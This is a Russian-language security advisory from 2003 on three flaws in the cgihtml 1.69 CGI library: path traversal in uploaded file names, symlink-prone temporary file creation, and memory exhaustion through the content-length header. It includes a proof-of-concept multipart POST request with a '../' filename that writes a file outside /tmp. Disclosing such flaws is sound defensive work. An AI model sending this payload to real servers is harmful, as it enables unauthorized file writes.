Множественные уязвимости в Cgihtml

Дата публикации:
08.01.2003
Всего просмотров:
1185
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Cgihtml – набор подпрограмм для анализа CGI ввода и создания на его основе HTML кода. В программе обнаружено несколько уязвимостей:

1. Небезопасное использование временных файлов

При обработки формы загрузки файла на сервер (content type 'multipart/form-data'), cgihtml пытается создать фай в системном system /tmp каталоге, используя имя, обеспеченное пользователем, не делая никаких проверок на этом имени. Уязвимость позволяет записывать файл в любое место на файловой системе вне /tmp каталога, используя имя файла с путем, содержащим ' ../.

2. Небезопасное создание временных файлов

При создании временного файла, не проверяется его предварительное существование. Уязвимость позволяет локальному атакующему создать символьную ссылку к произвольному чувствительному файлу, который будет перезаписан при попытке создать временный файл.

3. Уязвимость в интерпретации content-length заголовка

cgihtml выделяет память, используя значение content-length, снабженное пользователем. Атакующий может представить чрезмерно длинное значение content-length, которое вызовет исчерпание всей доступной памяти.

Эксплоит (к 1 уязвимости)

 
POST http://someserver.com/blah.cgi HTTP/1.0
User-Agent: Haxor
Content-Type: multipart/form-data;
boundary=#123456789#multipart#boundary#1234567890#
Content-Length: 282
--#123456789#multipart#boundary#1234567890#
Content-Disposition: form-data; name="Haxor"; filename="../../../tmp/haxor.html"
<HTML>
<HEAD><TITLE>Haxor</TITLE></HEAD>
<BODY><H1>This page should not be here</H1></BODY>
</HTML>
--#123456789#multipart#boundary#1234567890#--
Уязвимость обнаружена в cgihtml 1.69

Ссылки: Multiple cgihtml vulnerabilities
или введите имя

CAPTCHA